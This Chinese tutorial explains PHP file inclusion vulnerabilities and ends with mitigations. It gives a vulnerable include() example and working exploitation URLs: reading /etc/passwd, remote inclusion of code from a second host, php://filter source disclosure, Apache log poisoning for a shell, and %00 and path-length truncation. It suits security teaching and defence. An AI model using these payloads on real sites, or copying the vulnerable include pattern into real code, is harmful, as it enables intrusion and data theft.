0x00 文件包含概念以及分类

程序开发人员通常会把要重复使用的函数写到单个文件中，在使用某个函数时直接在文件里面调用此函数无需再次编写。

文件包含有两种：

  本地文件包含

  远程文件包含 ：即加载远程文件，在php.ini中开启allow_url_include、allow_url_fopen选项。开启后可以直接执行任意代码。

文件包含有两种：

  本地文件包含

  远程文件包含 ：即加载远程文件，在php.ini中开启allow_url_include、allow_url_fopen选项。开启后可以直接执行任意代码。

0x01 漏洞成因

程序开发人员通常出于灵活性的考虑，会将被包含的文件设置成变量，然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件，造成文件包含漏洞。

0x02 PHP文件包含函数

include()

使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。

inclue_once()

功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。

require()

使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。

require_once()

功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。

0x03 漏洞代码示例

<?php

if($_GET['test']){

include($_GET['test']);

}else{

include(index.php);

}

?>

<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size:18px;">正常的URL访问：http://www.test.com/index.php?test=xxx.php</span></span>

<span style="font-size:18px;">访问URL会包含xxx.php，但是因为xxx.php不存在，所以在包含时会出错，并且极有可能会爆出网站的绝对路径</span>

这只是一次简单的测试，攻击者完全有可能会更改test参数的值，执行一些恶意的代码，达到攻击的效果。

0x04 PHP文件包含利用

读取敏感文件

    访问：http://www.test.com/index.php?test=/etc/passwd,如果目标主机存在该文件，并且具有读权限，那么就可以读出文件内容。

远程包含shell

  用到了远程文件包含。确保目标主机开启了allow_url_fopen选项，在远程文件http://www.test1.com/test.txt里写入测试代码。

<?php fputs(fopen("text.php", "w"), "<?php phpinfo(); ?>") ?>

        访问：http://www.test.com/index.php?test=http://www.test1.com/test.txt,将会在网站根目录下生成text.php文件，内容就是："<?php phpinfo(); ?>"

图片上传并包含图片shenll

  利用方法和上面的一样，只是这次是本地包含，直接在上传的图片中写入测试代码并访问图片地址即可。

使用伪协议

  读取php文件：访问http://www.test.com/index.php?test=php://filter/read=convert.base64-encode/resource=config.php，将得到进过base64加密后的字符串。经过工具解密后，即可看到原内容。

包含日志文件GetShell

  条件：知道日志文件access.log的存放位置

  查找方法：

既然存在文件包含漏洞，那就利用漏洞读取Apache的配置文件找到日志文件的位置。

默认位置：/var/log/httpd/access_log

  利用:

  一般运行Apache之后，默认会生成两个日志文件access.log和error.log，access.log文件记录了客户端每次请求的相关信息。当我们访问一个不存在的资源时access.log文件仍然会记录这条资源信息。

如果目标网站存在文件包含漏洞，但是没有可以包含的文件时，我们就可以尝试访问http://www.test.com/<?php phpinfo(); ?>,Apache会将这条信息记录z在access.log文件中，这时如果我们访问access.log文件，就会触发文件包含漏洞。理论上是这样的，但是实际上却是输入的代码被转义无法解析。难道到这就结束了吗？不不不，攻击者可以通过burpsuite这个神器进行抓包在http请求包里面将转义的代码改为正常的测试代码就可以绕过。这时再查看Apache日志文件，显示的就是正常的测试代码。

这时访问：http://test.com/index.php?test=日志文件路径,即可成功执行测试代码。

截断包含

  漏洞代码：

<?php

    if(isset($_GET['test'])){

    include($_GET['test'].".php");

    }else{

    include(index.php);

    }

    ?>

这样做确实在一定程度上修复了漏洞，但是攻击者仍然可以利用截断手法进行绕过。

正常上传图片一句话并访问：http://test.com/index.php?test=1.jpg会出错，因为包含文件里面不存在1.jpg.php这个文

件。但是如果输入http://test.com/index.php?test=1.jpg%00，就极有可能会绕过检测。这种方法只适用于php.ini中magic_quotes_qpc=off并且PHP版本小于5.3.4的情况。如果为on，%00会被转义，以至于无法截断。

还有一种方法是路径长度截断，不过现在已经很少见了。适用于PHP版本至少小于5.2.8(不确定没尝试)。

  例：http://test.com/index.php?test=1.jpg../../../../../../...,(Windows需要长于256个字节，linux需要长于4096个字节)

0x05 修复方案

禁止远程文件包含 allow_url_include=off

配置 open_basedir=指定目录，限制访问区域。

过滤../等特殊符号

修改Apache日志文件的存放地址

开启魔术引号 magic_quotes_qpc=on

尽量不要使用动态变量调用文件，直接写要包含的文件。